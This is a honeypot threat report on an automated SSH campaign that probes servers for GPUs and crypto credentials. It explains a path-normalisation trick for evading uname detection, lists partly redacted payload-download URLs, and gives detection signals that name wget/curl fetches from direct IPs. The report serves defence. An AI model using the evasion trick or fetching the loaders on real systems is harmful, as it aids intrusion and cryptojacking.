The anatomy of the GPU hunter
Before installing any miner, the attacker needs to know whether the investment is worthwhile. A server without a GPU mines monero at a fraction of the hashrate of one with a GPU. The first objective, therefore, is hardware reconnaissance — and doing it without raising alerts.
The sequence we observed in 18.276 sessions is identical across all of them — the signature of an automated script:
Evasion technique: path traversal in uname
The use of /bin/./uname instead of uname is a technical detail with a clear purpose. The dot (.) in the middle of an absolute path is a directory element that references the current directory — in this context, it is ignored by the kernel. The result is exactly the same as uname.
The value lies in the string signature: a detection rule that looks for the literal uname in command logs might not catch /bin/./uname if the implementation does not normalize paths before comparing.
2.555 executions of /bin/./uname versus 33.548 of uname directly. The technique is used in specific sessions — it is not universal across the campaign, which suggests different tools or different configurations of the same scanner.
The link to crypto credentials
The GPU hunter campaign and the Solana-oriented credential dictionary are not a coincidence. Solana node operators frequently use servers with GPUs to accelerate validation operations. A compromised server belonging to a Solana validator offers double value:
- GPU for mining: immediate hashrate for XMRig or other miners
- Access to validator keys: potential theft of stake or validation commissions
- Access to hot-wallet funds: traders and validators frequently have wallets connected to the server
The payload attempt
On six occasions during the observation period, the sessions attempted to download an external script, spread across three distinct destinations. None managed to execute:
Defanged URLs (hxxp). Forensic artifacts — do not access or reconstruct.
http://151.242.[REDACTED].40/loader.sh — direct IP with no DNS resolution. 684 bytes captured in the honeypot's isolated environment; execution was blocked.
http://197.255.[REDACTED].88:1987/favico.ico — a high port and a decoy name (a fake favicon). Exactly 684 bytes, the same size as the previous one: the same payload served from a second host.
http://31.172.[REDACTED].45/mot — 2 attempts, 0 bytes received. The download failed or was blocked at the source.
How to detect GPU hunters in your infrastructure
The detection signals are clear and inexpensive to implement:
- Alert on
nvidia-smiorlspciin SSH logs: no legitimate maintenance script needs to run these commands via SSH immediately upon authentication. - Detect the
SSH-2.0-Goclient: if your infrastructure has no internal applications written in Go that connect over SSH, any connection with that fingerprint is suspicious. - Monitor downloads with
wgetorcurlto direct IPs: URLs likehxxp://1[.]2[.]3[.]4/share payload distributors, not legitimate traffic. - Block IPs with multiple failed credential attempts: fail2ban with a threshold of 5-10 attempts per IP in 60 seconds covers most of these scans.
Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.
CipherSentry SSH honeypot · 2026-06-26 to 2026-06-28